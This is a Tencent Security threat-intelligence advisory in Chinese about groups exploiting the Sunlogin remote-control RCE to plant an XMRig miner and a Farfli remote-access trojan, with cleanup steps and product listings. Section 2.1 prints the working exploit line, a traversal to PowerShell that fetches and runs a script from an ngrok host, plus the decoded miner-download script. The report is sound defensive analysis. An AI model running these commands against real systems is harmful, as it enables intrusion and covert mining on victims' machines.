多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

騰訊安全發表於2022-03-21

一、概述

近日，騰訊安全威脅情報中心檢測到有挖礦、遠控黑產團伙利用向日葵遠控軟體RCE漏洞攻擊企業主機和個人電腦，已有部分未修復漏洞的主機、個人電腦受害。攻擊者利用漏洞入侵後可直接獲得系統控制權，受害主機已被用於門羅幣挖礦。

在部分城市因疫情管理需要，遠端辦公場景增多，向日葵類遠端控制軟體的應用也會增加，從而系統被駭客利用漏洞入侵控制的風險也隨之增加。騰訊安全專家建議政企機構與個人電腦使用者將向日葵遠控軟體升級到最新版本以修復漏洞，建議避免將不必要的埠及服務在公網開放，避免將個人遠控軟體安裝在業務伺服器中。推薦使用騰訊零信任iOA、或騰訊電腦管家進行病毒掃描，排查系統是否已被入侵，採用零信任iOA解決遠端安全接入需求，避免疫情期間系統被駭客控制而造成損失。

向日葵是一款免費的，集遠端控制電腦、手機、遠端桌面連線、遠端開機、遠端管理、支援內網穿透等功能的一體化遠端控制管理軟體。今年2月，向日葵個人版V11.0.0.33之前的版本與簡約版V1.0.1.43315（2021.12）之前的版本被披露存在遠端程式碼執行（RCE）漏洞，漏洞編號CNVD-2022-10270，CNVD-2022-03672。

存在漏洞的系統啟動服務端軟體後，會開放未授權訪問埠，攻擊者可透過未授權訪問無需密碼直接獲取session，並藉此遠端執行任意程式碼。從而導致存在漏洞的個人電腦或伺服器被駭客入侵控制。

在上述高危漏洞出現後，騰訊安全旗下的主機安全產品、零信任iOA、漏洞掃描服務、高危威脅檢測系統均已支援對向日葵RCE漏洞的檢測和防禦。

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

騰訊零信任iOA攔截利用向日葵RCE漏洞的攻擊

本次利用向日葵遠端程式碼執行漏洞攻擊傳播的挖礦木馬為XMRig（門羅幣）挖礦程式，企業或個人使用者可參考以下內容自查後清理：

1.檢視工作管理員，結束高CPU/GPU佔用的程式；

2.檢視c:\users\public\目錄下是否存在木馬檔案xmrig.exe、WinRing0x64.sys、config.json，如果有，就刪除這些檔案。

遠控木馬使用Farfli家族開原始碼編譯而成，自查與清理方式：

1.檢視Svchost下的服務名，清理服務NETRUDSL

透過執行msconfig，或regedit檢查以下相關係統服務是否存在：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost

2.刪除遠控木馬檔案

C:\Windows\33649531.dll（在不同主機上33649531為隨機8位數字）

騰訊安全系列產品已支援檢測、查殺利用向日葵遠端程式碼執行漏洞攻擊傳播的XMRig類挖礦木馬與Farfli家族遠控木馬，具體響應清單如下：

應用場景

安全產品

解決方案

威

脅

情

報

騰訊T-Sec

威脅情報雲查服務

（SaaS）

1）xmrig挖礦木馬與Farfli遠控木馬相關IOCs已入庫。

各類安全產品可透過“威脅情報雲查服務”提供的介面提升威脅識別能力。可參考:https://cloud.tencent.com/product/tics

騰訊T-Sec

高階威脅追溯系統

1）XMRig類挖礦木馬與Farfli家族遠控木馬相關資訊和情報已支援檢索。

網管可透過威脅追溯系統，分析日誌，進行線索研判、追溯網路入侵源頭。T-Sec高階威脅追溯系統的更多資訊，可參考：https://cloud.tencent.com/product/atts

雲原生

安全

防護

雲防火牆

（CFW）

基於網路流量進行威脅檢測與主動攔截，已支援向日葵遠端控制工具遠端程式碼執行漏洞CNVD-2022-10270，CNVD-2022-03672利用檢測。

有關雲防火牆的更多資訊，可參考：
https://cloud.tencent.com/product/cfw

騰訊T-Sec 主機安全

（CWP）

1）已支援查殺XMRig類挖礦木馬與Farfli家族遠控木馬；

2)已支援檢測向日葵遠端控制工具遠端程式碼執行漏洞；

3)已支援檢測利用向日葵遠端控制工具遠端程式碼執行漏洞發起的攻擊。

騰訊主機安全（雲鏡）提供雲上終端的防毒防毒、防入侵、漏洞管理、基線管理等。關於T-Sec主機安全的更多資訊，可參考：https://cloud.tencent.com/product/cwp

騰訊T-Sec 安全運營中心（SOC）

基於客戶雲端安全資料和騰訊安全大資料的雲安全運營平臺。已接入騰訊主機安全（雲鏡）、騰訊御知等產品資料匯入，為客戶提供漏洞情報、威脅發現、事件處置、基線合規、及洩漏監測、風險可視等能力。

關於騰訊T-Sec安全運營中心的更多資訊，可參考：https://s.tencent.com/product/soc/index.html

非雲企業安全防護

騰訊T-Sec

高階威脅檢測

（騰訊御界）

已支援向日葵遠端控制工具遠端程式碼執行漏洞CNVD-2022-10270，CNVD-2022-03672利用檢測。

關於T-Sec高階威脅檢測系統的更多資訊，可參考：

https://cloud.tencent.com/product/nta

騰訊iOA零信任

（IOA）

1）已支援查殺XMRig類挖礦木馬與Farfli家族遠控木馬；

2)已支援檢測利用向日葵遠端控制工具遠端程式碼執行漏洞發起的攻擊。

關於T-Sec iOA零信任安全管理系統的更多資訊，可參考：https://s.tencent.com/product/5

更多產品資訊，請參考騰訊安全官方網站https://s.tencent.com/

二、詳細分析

2.1挖礦木馬

利用漏洞投遞並執行惡意指令碼：

ping../../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe -exec bypass -noexit -C IEX (new-object system.net.webclient).downloadstring(/"http://pingce.jp.ngrok.io/ob.ps1/")

指令碼內容解碼後如下：

$url = "http://pingce.jp.ngrok.io/xmrig.exe"

$url2 = "http://pingce.jp.ngrok.io/config.json"

$url3 = "http://pingce.jp.ngrok.io/WinRing0x64.sys"

$output = "C:\users\public\xmrig.exe"

$output2 = "C:\users\public\config.json"

$output3 = "C:\users\public\WinRing0x64.sys"

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $output)

$wc.DownloadFile($url2, $output2)

$wc.DownloadFile($url3, $output3)

taskkill /f /t /im xmrig.exe

Remove-Item -Path "C:\Users\public\c3pool" -Recurse

Start-Sleep -s 15

start-process "c:\users\public\xmrig.exe" -ArgumentList "-c c:\users\public\config.json"

釋放系統挖礦程式，啟動指定配置的XMRig挖礦程式。

2.2遠控木馬

木馬外殼分割槽段裝載遠控木馬，tProtectVirtualMemory修改記憶體屬性為可讀可執行。

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

最終釋放出的可執行檔案為Farfli家族開原始碼編譯而成的遠控木馬。

多個黑產團伙利用向日葵遠控軟體RCE漏洞攻擊傳播

該木馬對外提供的功能模組

模組	功能
Install	svchost.exe -k "NETRUDSL"安裝服務，實現開機自啟動服務路徑： HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Svchost 服務名：NETRUDSL Dll路徑：C:\Windows\33649531.dll（不同主機33649531為隨機8位數）
Uninstall	刪除服務
ServiceMain	開源的Farfli遠控木馬的功能模組包含檔案管理、鍵盤記錄、遠端桌面控制、系統管理、影片檢視、語音監聽、遠端定位等遠端操縱功能。例如本樣本中的遠端桌面控制功能，透過修改兩個登錄檔項配置可遠端訪問，並設定遠端登入tcp會話作為控制檯會話，繞過網路對於tcp遠端訪問的限制，修改的登錄檔專案如下： HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSUserEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\TSAppCompat